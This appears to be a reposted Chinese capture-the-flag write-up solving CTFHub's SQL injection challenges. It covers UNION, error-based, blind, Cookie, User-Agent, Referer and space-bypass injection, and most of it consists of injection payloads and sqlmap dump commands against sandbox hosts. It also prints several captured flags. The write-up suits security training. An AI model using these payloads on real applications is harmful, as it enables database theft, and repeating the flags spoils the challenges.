CTFHub技能树 Web-SQL注入详解

Posted 星球守护者

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFHub技能树 Web-SQL注入详解相关的知识,希望对你有一定的参考价值。

文章目录


0x01 整数型注入

解题WP
第一步 尝试闭合点

第二步 判断列数

id=1 order by 2 页面正常
id=1 order by 3 页面未回显数据


第三步 联合查询,判断回显位置
/?id=-1 union select 1,2

第四步 执行数据库语句
-1 union select 1,database()

第五步 查询当前数据库下的表名
id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

第六步 查询表下的字段
?id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'

第七步 输入字段值
?id=-1 union select 1,flag from sqli.flag

0x02 字符型注入

解题WP
第一步 闭合方式
/?id=1' --+'

第二步 查看回显字段的位数

id=1' order by 2 --+' 页面正常
id=1' order by 3 --+' 页面未回显数据

第三步 判断回显的位置
-1' union select 1,2 --+'

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 --dbs

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns

sqlmap -u http://challenge-e9227c10fafe8768.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump

0x03 报错注入

第一步 判断注入

id=1页面回显正常
id=1'发现页面报错,回显数据库错误信息


第二步 使用updatexml注入,数据库名称

 updatexml(xml_document,xpath_string,new_value)
第一个参数:xml_document,为xml文档对象名称,是数据库x库的doc字段
第二个参数:xpath_string:xpath语法
第三个参数:new_value:替换查找到的符合条件的字符(string)

/?id=1 and updatexml(1,concat(0x5e,database()),1)

第三步 获取表名
编解码在线工具
https://www.toolhelper.cn/

/?id=1 and updatexml(1,concat(0x5e,(select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69),0x5e),1)

第四步 获取字段

/?id=1 and updatexml(1,concat(0x5e,(select group_concat(column_name) from information_schema.columns where table_name=0x666c6167),0x5e),1)

第五步 获取字段值

/?id=1 and updatexml(1,concat(0x5e,(select flag from sqli.flag),0x5e),1)
发先flag少了一部分
mid 就可以得到flag后面的一部分
/?id=1 and updatexml(1,concat(0x5e,mid((select flag from sqli.flag),32),0x5e),1)


0x04 布尔盲注

--dbs 
-D sqli --tables 
-D sqli -T flag columns --dump

sqlmap -u "http://challenge-70a9e8b793dd9d2b.sandbox.ctfhub.com:10800/?id=1" --dbs


sqlmap -u "http://url/?id=1" -D sqli --tables --batch

sqlmap -u "http://url/?id=1" -D sqli -T flag --columns --batch

 sqlmap  -u "http://url/?id=1" -D sqli -T flag -C flag --dump --batch 
ctfhubc04dd02440c0191e73caad9c

0x05 时间盲注

--dbs 
-D sqli --tables 
-D sqli -T flag --columns 
-D sqli -T flag -C flag --dump
--batch


0x06 mysql结构

--dbs 
-D sqli --tables 
-D sqli -T whvvzxswne columns --dump
sqlmap -u http://url/?id=1  -D sqli -T  qtcwgcmzbh   -C  jkcwouoqak   --dump  --batch 
ctfhubf37e47264f12f73fe5129649

0x07 Cookie注入

第一步 确定闭合

Cookie: id=1  数字型注入

第二步 查看回显字段的位数

Cookie: id=1 order by 2; 页面正常
Cookie: id=1 order by 3; 页面异常


第三步 使用union查询,查看回显位置

Cookie: id=-1 union select 1,2;

第四步 查看当前数据库

Cookie: id=-1 union select 1,database();

第五步 查看表名

Cookie: id=-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1);
trxfffaswl
news


第六步 查询字段

Cookie: id=-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='trxfffaswl' limit 0,1);
brdjzysggi

第七步 查看字段值

Cookie: id=-1 union select 1,(select brdjzysggi from trxfffaswl limit 0,1);

0x08 空格绕过

第一步 确定闭合
?id=1/**/or/**/1=1 //测试or,and等特殊字符是否被过滤

第二步 查看回显字段的位数

?id=1/**/order/**/by/**/2;页面正常
?id=1/**/order/**/by/**/3; 页面异常


第三步 使用union查询,查看回显位置

?id=-1/**/union/**/select/**/1,2

第四步 查看当前数据库

-1/**/union/**/select/**/1,database()

第五步 查看表名

表明1
?id=-1/**/union/**/select/**/1,(select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/0,1)
表名2
?id=-1/**/union/**/select/**/1,(select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'/**/limit/**/1,1)
ID: imrqzusgig
Data: news

第六步 查询字段

?id=-1/**/union/**/select/**/1,(select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='sqli'/**/and/**/table_name='imrqzusgig'/**/limit/**/0,1)
Data: sxiiqtwdft

第七步 查看字段值

?id=-1/**/union/**/select/**/1,(select/**/sxiiqtwdft/**/from/**/imrqzusgig/**/limit/**/0,1)

0x09 UA注入

第一步 构造闭合

1 or 1=2 页面回显正常
1 and 1=2


第二步 查询列数量

1 order by 1,2,3  页面报错
1 order by 1,2  页面正常


第三步 判断回显,查询数据库

-1 union select 1,2 
-1 union select 1,database()


第四步 查看表名称

-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)
cutmmwbdxt
news

第五步 查看字段名称

-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='cutmmwbdxt' limit 0,1)
iezonoaoey

第六步 查看字段值

-1 union select 1,(select iezonoaoey   from cutmmwbdxt limit 0,1)
ctfhub509b5eecd5afe7a69925baad

0x10 Refer注入

第一步 构造闭合

1 or 1=2 页面回显正常
1 and 1=2


第二步 查询列数量

1 order by 1,2,3  页面报错
1 order by 1,2  页面正常


第三步 判断回显,查询数据库

-1 union select 1,2 
-1 union select 1,database()

第四步 查看表名称

-1 union select 1,(select table_name from information_schema.tables where table_schema=database() limit 0,1)
skwdbewppe
news

第五步 查看字段名称

-1 union select 1,(select column_name from information_schema.columns where table_schema=database() and table_name='skwdbewppe' limit 0,1)
lmdptzbbsz

第六步 查看字段值

-1 union select 1,(select lmdptzbbsz  from skwdbewppe limit 0,1)
ctfhub696d71da4c29a525eb09512d

所有的SQL注入完成

总结

level有5级,越高检测越全,默认为 1

--level 1 检测Get和Post

--level 2 检测HTTP Cookie

--level 3 检测User-Agent和Referer

--level 4 检测

--level 5 检测 HOST 头

risk有3级,级别越高风险越大,默认为1

--risk 2 会在默认的检测上添加大量时间型盲注语句测试

--risk 3 会在原基础上添加OR 类型的布尔型盲注 ,可能会update导致修改数据库

摘抄

如果你有一堆苹果,有好有坏,你应该先吃好的,把烂的扔掉。如果你先吃坏的,好的也会变坏,你就永远吃不到好的,这就是苹果定律。
苹果定律告诉我们,人必须善于取舍,要记住先做你生命中最重要的事。
仔细想想,人生曾有多少次机遇被我们错过,有多少重要的事被我们割舍。每个阶段都有不同的目标,找到当下最核心最重要的事,是一个人最大的本事和能力。
  ---《苹果定律》

以上是关于CTFHub技能树 Web-SQL注入详解的主要内容,如果未能解决你的问题,请参考以下文章

CTFHub——技能树——SQL注入(sqlmap)

CTFHub-技能树-命令执行

CTFHub技能树笔记之RCE:命令注入过滤cat过滤空格

CTFHub技能树 Web-文件上传详解

CTFHub技能树 Web-文件上传详解

CTFHub-技能树-文件上传